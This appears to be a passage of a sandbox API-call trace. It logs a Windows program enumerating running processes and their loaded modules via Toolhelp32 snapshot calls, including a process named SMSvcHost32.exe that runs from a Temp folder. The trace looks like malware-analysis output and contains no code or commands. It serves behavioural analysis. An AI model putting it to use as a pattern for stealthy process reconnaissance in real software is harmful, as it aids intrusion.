	[0107.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\kernel.appcore.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\kernel.appcore.dll", lpUsedDefaultChar=0x0) returned 39
	[0107.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kernel.appcore.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel.appcore.dll", lpUsedDefaultChar=0x0) returned 19
	[0107.129] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\eappcfg.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\eappcfg.dll", lpUsedDefaultChar=0x0) returned 32
	[0107.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eappcfg.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eappcfg.dll", lpUsedDefaultChar=0x0) returned 12
	[0107.130] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.132] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.133] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.134] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.135] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.136] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.137] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.138] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.139] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.140] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.141] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.143] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.144] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.145] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.147] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.148] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.149] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.168] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.169] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.170] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.171] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.173] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.174] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.175] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.176] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.178] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.185] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.186] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.187] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.189] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.190] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.191] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.193] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.194] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.195] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.197] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.198] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.199] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.201] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.202] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.203] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.204] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.205] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.206] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.222] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.223] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.224] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.225] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.226] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.227] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.228] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.230] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.231] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.231] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 0
	[0107.232] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xe6c, pcPriClassBase=4, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0107.233] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x30c) returned 0x894
	[0107.237] Module32FirstW (hSnapshot=0x894, lpme=0x20af280) returned 1
	[0107.238] Module32NextW (hSnapshot=0x894, lpme=0x20af280) returned 1
	[0107.238] Module32NextW (hSnapshot=0x894, lpme=0x20af280) returned 1
	[0107.239] Module32NextW (hSnapshot=0x894, lpme=0x20af280) returned 1
	[0107.239] Module32NextW (hSnapshot=0x894, lpme=0x20af280) returned 0
	[0107.240] Module32FirstW (hSnapshot=0x894, lpme=0x20af280) returned 1
	[0107.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SysWOW64\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SysWOW64\\cmd.exe", lpUsedDefaultChar=0x0) returned 28
	[0107.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 8
	[0107.241] Module32NextW (hSnapshot=0x894, lpme=0x20af280) returned 1
	[0107.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ntdll.dll", lpUsedDefaultChar=0x0) returned 30
	[0107.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntdll.dll", lpUsedDefaultChar=0x0) returned 10
	[0107.241] Module32NextW (hSnapshot=0x894, lpme=0x20af280) returned 1
	[0107.242] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 33
	[0107.242] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 13
	[0107.242] Module32NextW (hSnapshot=0x894, lpme=0x20af280) returned 1
	[0107.243] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 35
	[0107.243] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 15
	[0107.243] Module32NextW (hSnapshot=0x894, lpme=0x20af280) returned 0
	[0107.243] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 8
	[0107.243] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x934, pcPriClassBase=8, dwFlags=0x0, szExeFile="SMSvcHost32.exe")) returned 1
	[0107.244] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xdd4) returned 0x898
	[0107.249] Module32FirstW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.250] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.251] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.252] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.253] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.254] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.254] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.268] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.269] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.270] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.271] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.272] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.273] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.274] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.274] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.275] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.276] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.277] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.278] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.279] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.279] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.280] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.281] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.282] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.283] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.284] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.284] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.285] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.286] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.287] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.288] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.289] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.290] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.291] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.292] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.293] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.294] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.295] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.296] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.298] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.299] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.300] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.301] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.323] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.324] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.325] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.326] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.327] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.328] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.329] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.331] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.332] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.333] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.334] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.335] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.336] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.337] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.338] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.339] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.340] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.341] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.343] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.344] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.345] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.346] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.347] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.348] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.349] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.350] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.352] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.353] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.354] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.355] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.356] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.371] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.372] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.373] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.374] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.375] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.376] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.377] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.378] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.379] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.380] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.381] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.382] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.383] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.384] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.385] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.386] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.387] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.388] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.388] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 0
	[0107.389] Module32FirstW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 53
	[0107.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 16
	[0107.390] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ntdll.dll", lpUsedDefaultChar=0x0) returned 30
	[0107.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntdll.dll", lpUsedDefaultChar=0x0) returned 10
	[0107.391] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 33
	[0107.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 13
	[0107.392] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 35
	[0107.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 15
	[0107.393] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\advapi32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\advapi32.dll", lpUsedDefaultChar=0x0) returned 33
	[0107.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="advapi32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="advapi32.dll", lpUsedDefaultChar=0x0) returned 13
	[0107.394] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", lpUsedDefaultChar=0x0) returned 31
	[0107.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcrt.dll", lpUsedDefaultChar=0x0) returned 11
	[0107.395] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\sechost.dll", lpUsedDefaultChar=0x0) returned 32
	[0107.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sechost.dll", lpUsedDefaultChar=0x0) returned 12
	[0107.396] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", lpUsedDefaultChar=0x0) returned 31
	[0107.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RPCRT4.dll", lpUsedDefaultChar=0x0) returned 11
	[0107.397] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", lpUsedDefaultChar=0x0) returned 32
	[0107.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SspiCli.dll", lpUsedDefaultChar=0x0) returned 12
	[0107.398] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 34
	[0107.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 14
	[0107.399] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 41
	[0107.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 21
	[0107.399] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\dsprop.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\dsprop.dll", lpUsedDefaultChar=0x0) returned 31
	[0107.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dsprop.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dsprop.dll", lpUsedDefaultChar=0x0) returned 11
	[0107.400] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\USER32.dll", lpUsedDefaultChar=0x0) returned 31
	[0107.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USER32.dll", lpUsedDefaultChar=0x0) returned 11
	[0107.401] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.402] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\GDI32.dll", lpUsedDefaultChar=0x0) returned 30
